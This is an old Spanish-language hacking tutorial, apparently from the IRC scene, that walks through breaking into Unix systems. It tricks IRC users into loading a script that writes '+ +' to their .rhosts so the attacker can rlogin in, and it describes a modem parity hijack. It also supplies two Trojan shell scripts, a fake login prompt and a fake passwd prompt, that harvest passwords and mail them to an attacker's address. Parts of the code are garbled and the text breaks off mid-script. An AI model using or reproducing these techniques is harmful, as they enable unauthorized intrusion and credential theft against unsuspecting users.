Hola a todos. Espero que los que leais este documento comprendais como se hackea un unix. En mis frecuentes visitas al IRC mucha gente pregunta sobre el /etc/passwd, mucha gente anda buscando diccionarios de palabras y otros tantos buscan el mejor crackeador. ¨ para que ?. Hay maneras mucho mas rapidas y por supuesto divertidas de conseguir una cuenta. Y por supuesto es demasiado dificil desencriptar la cuenta del root, por lo que solo se utiliza en casos extremos, asi como los programas tipo dictmake solo se usan en casos muy raros y cuando no nos queda otro recurso. Empezamos. Antes de empezar me gustaria que quedara claro que si quereis ser hackers en serio necesitais linux, no es absolutamente necesario pero facilita muchisimo las cosas. Para hackear un unix la primera cosa que necesitamos es, logico, introducirse en el sistema. Algunos otros ordenadores tienes ftpïs anonimos a los que podemos acceder, pero hacedme caso, no servir para nada. Para introducirnos en un sistema necesitamos que tenga al menos una parte de acceso publico. Generalmente esa parte es la famosa pantalla " Login: y Password: " que me imagino que todos conocereis. Esta pantalla simplemente vale para identificar que la entrada de un usuario en ese sistema sa legitima. Sin embargo esas tontas maquinas que solo saben la diferencia entre 0 y 1 si les damos un login y password que esten dados de alta en ese sistema nos dejara pasar ( a no ser que tengan un sistema de reconocimiento de IP para lo que necesitariamos hacer IP-Spoofing , pero esto solo nos ocurrira en ciertos ordenadores de alta seguridad ). ¨ Como conseguir acceso al sistema ? La manera mas facil, la ingenieria social. No creo que haga falta explicar eso. Simplemente podeis utilizar en comando finger, para los que useis linux y los que no usais el finger del mIrc. Este comando nos dara informacion sobre el titular del e-mail que nostros le demos, que segun la maquina sera, o mas o menos o a veces nada. Menos da una piedra. Si estais desde linux podeis usar comandos "r" como "rlogin loquesea.com -l loginquesea" esto os mete en el sistema, pero hay que conseguir una cuenta para poder usar los exploits que explicar‚ mas adelante. Sin embargo hay otras maneras de conseguir acceso al sistema, como por ejemplo la que explico ahora COMO ACCEDER A UN ORDENADOR HACKEANDO DESDE EL IRC: Esto solo lo podeis hacer desde linux, yo lo he probado desde win95 y 3.1 y no lo he conseguido hacer. Primero hacemos un /whois #uncanalconmuchagente para encontrar si hay alguien que se conecte desde un unix, que normalmente ser una universidad. El unico problema que tiene esto es que no podemos elegir el ordenador, pero de todas maneras es muy divertido. Lo unico que necesitamos es meter la cadena + + en su fichero /.rhosts y la verdad es que es una tonteria tremenda. Buscamos a la victima y vamos a un canal donde este el, despues le hablaremos desde un privado. Ahora entra la imaginacion de cada uno, porque tenemos que mandarle un fichero por DCC ( por ejemplo prueba.irc ) y que el escriba: /load prueba.irc Me imagino que vuestra imaginacion os ayudara a resolverlo. Lo primero es conseguir el fichero prueba.irc. Solo esta linea : /exec echo: "/exec echo + + $HOME/.rhosts prueba.irc Ya tenemos el fichero prueba, lo mejor es que para que no se de cuenta podemos a¤adirle alguna conachada que se nos ocurra ( alla cada uno se las apa¤e ). Listo. Cuando el tio en cuestion escriba /load prueba.irc nosotros ejecutamos % rlogin ordenador_de_la_victima.com -l login_de_la_victima Ya estamos dentro. Facil ¨ No ? Y para terminar un truquillo que quizas os valga para algo, simplemente cambiamos la paridad de nuestro modem a 7E1 y telneteamos al ordenador en cuestion. Si hemos tenido suerte, cuando alguien intente conectarse, nos "colaremos" en su lugar. Despues de todo esto se supone que ya estamos dentro. Ahora hay que, o sacar una cuenta si no la tenemos o conseguir privilegios de root. Para lo primero: - Podemos usar el archirenombrado /ect/passwd ( si tenemos privilegios para leerlo ) y crackearlo pero si quereis mi consejo solo usad el fichero passwd para conseguir una cuenta cualquiera en el sistema y poder ejecutar comandos en ‚l, poder usar un bug o exploit. - Usar un trojan o Caballo De Troya, esta opcion tambien requiere tiempo pero por supuesto menos que crackear el fichero passwd, por que funciona en cuanto cualguier usuario se conecte al sistema. ATENCION, si conseguimos la cuenta del root nos podremos saltar el paso " conseguir privilegios de root ", aunque los sysadmins, algunos, pueden sospechar aunque la verdad es que despues de hackear durante un tiempo te das cuenta de lo estupidos que pueden llegar a ser. Quizas sea una de las mejores formas. Un caballo de troya es un fichero que metido en el sistema hace que un usuario crea que ha introducido su password mal, pero en realidad el password es enviado a la direccion de correo que nosostros le digamos. Aqui incluyo uno, pero acordaos de ponerle la direccion a la que quereis que os mande el passwd, y ademas en algunos sistemas en lugar de "Login:" nos dice : "marte login: " o algo distinto de login, por lo que tambien lo tenemos que cambiar para que nadie note la diferencia. Este es : ------SCRIPT------ #!/bin/sh rm -rf $0 cp $HOME/.login $HOME/.l echo ''$HOME/.hushlogin echo "stty intr '^@' echo 'Login incorrect' echo -n 'login: ' echo $<>.t echo -n 'Password: ' stty -echo echo $<>.t mail tunombre@tudirecciondecorreoanonima$HOME/.login ----END SCRIPT---- Este tipo de scripts tambien se pueden usar en /bin/passwd, para cuando un usuario cambie su contrase¤a pero el problema es que no es muy normal que un usuario cambie su contrase¤a, o por lo menos pasa muy de vez en cuando. Para mayor seguridad lo mejor es poner el que esta arriba,( para el caso es mejor poner los dos ) pero sin embargo aqui pongo el otro, por si acaso ( acordaos de la direccion de correo ) : ------SCRIPT------ #!/bin/tcsh echo -n "Changing password for $USER on ";hostname echo -n "Old password: " stty -echo echo $<>$HOME/.tym echo "" echo -n "New password: " echo $<>$HOME/.tym echo "" stty echo mail tunombre@tudirecciondecorreoanonima